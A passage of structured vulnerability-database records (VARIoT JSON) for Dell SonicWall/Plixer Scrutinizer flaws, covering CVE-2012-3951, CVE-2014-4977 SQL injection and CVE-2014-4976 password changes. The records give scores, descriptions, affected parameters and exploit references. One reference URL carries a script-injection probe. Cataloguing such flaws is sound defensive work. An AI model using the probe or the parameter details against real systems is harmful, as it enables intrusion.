{
"trust": 0.7,
"url": "http://www.securityfocus.com/bid/54731"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/20305"
},
{
"trust": 0.4,
"url": "http://www.plixer.com"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/20355/"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/exploit/windows/mysql/scrutinizer_upload_exec"
},
{
"trust": 0.1,
"url": "http://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\"\u003ehttp://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1\u003c/a\u003e"
},
{
"trust": 0.1,
"url": "http://blog.spiderlabs.com"
},
{
"trust": 0.1,
"url": "http://d.e.f.g/search?hl=en\u0026q=a\u003cscript\u003ealert(123)\u003c/script\u003e=1"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com/spiderlabs"
},
{
"trust": 0.1,
"url": "http://www.plixer.com/scrutinizer-netflow-sflow/scrutinizer.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3951"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2626"
},
{
"trust": 0.1,
"url": "http://www.plixer.com)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-3848"
},
{
"trust": 0.1,
"url": "https://www.trustwave.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2627"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-57232"
},
{
"db": "VULMON",
"id": "CVE-2012-3951"
},
{
"db": "BID",
"id": "54731"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-598"
},
{
"db": "NVD",
"id": "CVE-2012-3951"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-57232"
},
{
"db": "VULMON",
"id": "CVE-2012-3951"
},
{
"db": "BID",
"id": "54731"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
},
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-598"
},
{
"db": "NVD",
"id": "CVE-2012-3951"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-31T00:00:00",
"db": "VULHUB",
"id": "VHN-57232"
},
{
"date": "2012-07-31T00:00:00",
"db": "VULMON",
"id": "CVE-2012-3951"
},
{
"date": "2012-07-30T00:00:00",
"db": "BID",
"id": "54731"
},
{
"date": "2012-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003436"
},
{
"date": "2012-07-29T23:22:22",
"db": "PACKETSTORM",
"id": "115091"
},
{
"date": "2012-07-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-598"
},
{
"date": "2012-07-31T10:45:42.763000",
"db": "NVD",
"id": "CVE-2012-3951"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-57232"
},
{
"date": "2018-03-12T00:00:00",
"db": "VULMON",
"id": "CVE-2012-3951"
},
{
"date": "2012-08-08T19:02:00",
"db": "BID",
"id": "54731"
},
{
"date": "2012-08-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-003436"
},
{
"date": "2012-08-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201207-598"
},
{
"date": "2024-11-21T01:41:50.787000",
"db": "NVD",
"id": "CVE-2012-3951"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "115091"
},
{
"db": "CNNVD",
"id": "CNNVD-201207-598"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Plixer Scrutinizer (Dell SonicWALL Scrutinizer) In any SQL Command execution vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-003436"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201207-598"
}
],
"trust": 0.6
}
}
var-201407-0175
Vulnerability from variot
Multiple SQL injection vulnerabilities in Dell SonicWall Scrutinizer 11.0.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) selectedUserGroup parameter in a create new user request to cgi-bin/admin.cgi or the (2) user_id parameter in the changeUnit function, (3) methodDetail parameter in the methodDetail function, or (4) xcNetworkDetail parameter in the xcNetworkDetail function in d4d/exporters.php. Dell SonicWALL Scrutinizer is prone to multiple security vulnerabilities, including: 1. A privilege-escalation vulnerability 2. Multiple SQL-injection vulnerabilities Attackers can exploit these issues to perform certain actions with elevated privileges, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201407-0175",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "scrutinizer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "11.0.1"
},
{
"model": "sonicwall scrutinizer",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "11.0.1"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-365"
},
{
"db": "NVD",
"id": "CVE-2014-4977"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Brandon Perry",
"sources": [
{
"db": "BID",
"id": "68495"
}
],
"trust": 0.3
},
"cve": "CVE-2014-4977",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2014-4977",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-72918",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-4977",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-4977",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201407-365",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-72918",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72918"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-365"
},
{
"db": "NVD",
"id": "CVE-2014-4977"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple SQL injection vulnerabilities in Dell SonicWall Scrutinizer 11.0.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) selectedUserGroup parameter in a create new user request to cgi-bin/admin.cgi or the (2) user_id parameter in the changeUnit function, (3) methodDetail parameter in the methodDetail function, or (4) xcNetworkDetail parameter in the xcNetworkDetail function in d4d/exporters.php. Dell SonicWALL Scrutinizer is prone to multiple security vulnerabilities, including:\n1. A privilege-escalation vulnerability\n2. Multiple SQL-injection vulnerabilities\nAttackers can exploit these issues to perform certain actions with elevated privileges, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-4977"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
},
{
"db": "BID",
"id": "68495"
},
{
"db": "VULHUB",
"id": "VHN-72918"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-72918",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72918"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-4977",
"trust": 2.8
},
{
"db": "PACKETSTORM",
"id": "127429",
"trust": 2.5
},
{
"db": "BID",
"id": "68495",
"trust": 2.0
},
{
"db": "PACKETSTORM",
"id": "137098",
"trust": 1.1
},
{
"db": "EXPLOIT-DB",
"id": "39836",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003368",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201407-365",
"trust": 0.7
},
{
"db": "XF",
"id": "94439",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-72918",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72918"
},
{
"db": "BID",
"id": "68495"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-365"
},
{
"db": "NVD",
"id": "CVE-2014-4977"
}
]
},
"id": "VAR-201407-0175",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-72918"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T21:45:02.408000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dell SonicWALL Scrutinizer",
"trust": 0.8,
"url": "http://www.dell.com/jp/business/p/sonicwall-scrutinizer/pd?dgc=ST\u0026cid=33282\u0026lid=4254676\u0026acd=10591620522341418"
},
{
"title": "Scrutinizer",
"trust": 0.8,
"url": "http://www.sonicwall.com/us/en/support/6632.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72918"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
},
{
"db": "NVD",
"id": "CVE-2014-4977"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/127429/dell-sonicwall-scrutinizer-11.01-code-execution-sql-injection.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/68495"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2014/jul/44"
},
{
"trust": 1.7,
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"trust": 1.7,
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/39836/"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/137098/dell-sonicwall-scrutinizer-11.01-methoddetail-sql-injection.html"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94439"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4977"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4977"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/94439"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72918"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-365"
},
{
"db": "NVD",
"id": "CVE-2014-4977"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-72918"
},
{
"db": "BID",
"id": "68495"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-365"
},
{
"db": "NVD",
"id": "CVE-2014-4977"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-07-16T00:00:00",
"db": "VULHUB",
"id": "VHN-72918"
},
{
"date": "2014-07-10T00:00:00",
"db": "BID",
"id": "68495"
},
{
"date": "2014-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003368"
},
{
"date": "2014-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-365"
},
{
"date": "2014-07-16T14:19:04.370000",
"db": "NVD",
"id": "CVE-2014-4977"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-12T00:00:00",
"db": "VULHUB",
"id": "VHN-72918"
},
{
"date": "2014-07-24T00:09:00",
"db": "BID",
"id": "68495"
},
{
"date": "2014-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-003368"
},
{
"date": "2014-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201407-365"
},
{
"date": "2024-11-21T02:11:12.530000",
"db": "NVD",
"id": "CVE-2014-4977"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-365"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dell SonicWall Scrutinizer In SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003368"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201407-365"
}
],
"trust": 0.6
}
}
var-201407-0174
Vulnerability from variot
Dell SonicWall Scrutinizer 11.0.1 allows remote authenticated users to change user passwords via the user ID in the savePrefs parameter in a change password request to cgi-bin/admin.cgi. Dell SonicWALL Scrutinizer is prone to multiple security vulnerabilities, including: 1. A privilege-escalation vulnerability 2. Multiple SQL-injection vulnerabilities Attackers can exploit these issues to perform certain actions with elevated privileges, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201407-0174",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "scrutinizer",
"scope": "eq",
"trust": 1.6,
"vendor": "sonicwall",
"version": "11.0.1"
},
{
"model": "sonicwall scrutinizer",
"scope": "eq",
"trust": 0.8,
"vendor": "dell",
"version": "11.0.1"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-364"
},
{
"db": "NVD",
"id": "CVE-2014-4976"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:dell:sonicwall_scrutinizer",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Brandon Perry",
"sources": [
{
"db": "BID",
"id": "68495"
}
],
"trust": 0.3
},
"cve": "CVE-2014-4976",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CVE-2014-4976",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "VHN-72917",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:N/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-4976",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-4976",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201407-364",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-72917",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72917"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-364"
},
{
"db": "NVD",
"id": "CVE-2014-4976"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dell SonicWall Scrutinizer 11.0.1 allows remote authenticated users to change user passwords via the user ID in the savePrefs parameter in a change password request to cgi-bin/admin.cgi. Dell SonicWALL Scrutinizer is prone to multiple security vulnerabilities, including:\n1. A privilege-escalation vulnerability\n2. Multiple SQL-injection vulnerabilities\nAttackers can exploit these issues to perform certain actions with elevated privileges, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-4976"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
},
{
"db": "BID",
"id": "68495"
},
{
"db": "VULHUB",
"id": "VHN-72917"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-4976",
"trust": 2.8
},
{
"db": "PACKETSTORM",
"id": "127429",
"trust": 2.5
},
{
"db": "BID",
"id": "68495",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003367",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201407-364",
"trust": 0.7
},
{
"db": "XF",
"id": "94438",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-72917",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72917"
},
{
"db": "BID",
"id": "68495"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
},
{
"db": "CNNVD",
"id": "CNNVD-201407-364"
},
{
"db": "NVD",
"id": "CVE-2014-4976"
}
]
},
"id": "VAR-201407-0174",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-72917"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T21:45:02.369000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Dell SonicWALL Scrutinizer",
"trust": 0.8,
"url": "http://www.dell.com/jp/business/p/sonicwall-scrutinizer/pd?dgc=ST\u0026cid=33282\u0026lid=4254676\u0026acd=10591620522341418"
},
{
"title": "Scrutinizer",
"trust": 0.8,
"url": "http://www.sonicwall.com/us/en/support/6632.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-72917"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-003367"
},
{
"db": "NVD",
"id": "CVE-2014-4976"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
